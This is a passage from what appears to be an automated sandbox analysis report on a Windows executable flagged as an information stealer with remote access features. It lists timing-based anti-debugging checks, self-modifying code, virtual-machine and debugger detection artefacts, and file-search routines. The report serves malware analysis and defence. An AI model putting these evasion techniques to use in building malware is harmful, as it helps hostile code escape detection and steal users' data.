                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33183 second address: A33188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A332E8 second address: A332EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37D37 second address: A37D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE2Ah 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 jc 00007F7F1511CE26h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E501 second address: A3E51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA58h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E946 second address: A3E94B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A441AE second address: A441D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA5Dh 0x0000000b jmp 00007F7F147AEA57h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F7F147AEA46h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A4A second address: A45A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A4E second address: A45A7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA58h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A7A second address: A45A9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F7F1511CE2Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F7F1511CE26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45A9D second address: A45AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45AAC second address: A45AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A495A8 second address: A495BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A495BE second address: A495C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A496DC second address: A496F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F7F147AEA46h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FEEB second address: A4FEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57992 second address: A579B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59DD2 second address: A59DE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59DE0 second address: A59DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9948E1 second address: 9948FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6F3A4 second address: A6F3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7F147AEA59h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 jmp 00007F7F147AEA50h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A723DE second address: A723E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A00 second address: A73A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A0F second address: A73A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A13 second address: A73A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 jc 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A2E second address: A73A3C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A3C second address: A73A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B83C second address: A7B850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A393 second address: A7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A397 second address: A7A3CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1511CE39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7A3CC second address: A7A3E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7F147AEA46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7A3E8 second address: A7A3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7A3EC second address: A7A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 996482 second address: 996488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7F87F second address: A7F883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7F883 second address: A7F8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F7F1511CE3Ah 0x0000000e jmp 00007F7F1511CE34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7F8A5 second address: A7F8BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA50h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7FA82 second address: A7FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 popad 0x0000000a jmp 00007F7F1511CE33h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7FAAA second address: A7FAB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9CC51 second address: A9CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE2Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9E97A second address: A9E97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9E97E second address: A9E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAD717 second address: AAD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AADE2D second address: AADE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F1511CE26h 0x0000000a jl 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AADE3E second address: AADE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AADE48 second address: AADE52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1511CE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAE10C second address: AAE112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAE242 second address: AAE24C instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB109A second address: AB10B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3CF0 second address: AB3CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3CF5 second address: AB3D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7F147AEA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3F4A second address: AB3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3F4E second address: AB3F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3F54 second address: AB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F7F1511CE2Bh 0x00000015 jnp 00007F7F1511CE29h 0x0000001b adc dh, FFFFFF8Fh 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D2971h] 0x00000025 jnc 00007F7F1511CE36h 0x0000002b push 29A5B6F5h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7F1511CE37h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3FC5 second address: AB3FCF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB3FCF second address: AB3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB7376 second address: AB737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB737A second address: AB738C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7F1511CE2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5480239 second address: 5480248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5480248 second address: 548024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 548024E second address: 5480252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5480252 second address: 548028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7F1511CE2Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F7F1511CE2Bh 0x00000018 popfd 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 548028C second address: 54802B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F147AEA4Ah 0x0000000c xor ecx, 25DF0888h 0x00000012 jmp 00007F7F147AEA4Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54802B6 second address: 54802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 4364h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5480346 second address: 548034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 548034C second address: 5480351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CFDC1 second address: 9CFDE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F7F147AEA46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CFDE3 second address: 9CFDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8219E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9C686F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9ECA21 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_005D4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_005CE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_005D4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_005CED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_005D3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C1160 GetSystemInfo,ExitProcess, 0_2_005C1160
Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`|P
Source: file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13352
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13349
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13372
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13404
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13364
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_005C45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_005D9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9750 mov eax, dword ptr fs:[00000030h] 0_2_005D9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_005D7850
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_005D9600
Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DjF=Program Manager
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oDjF=Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_005D7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_005D6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_005D7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_005D7A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
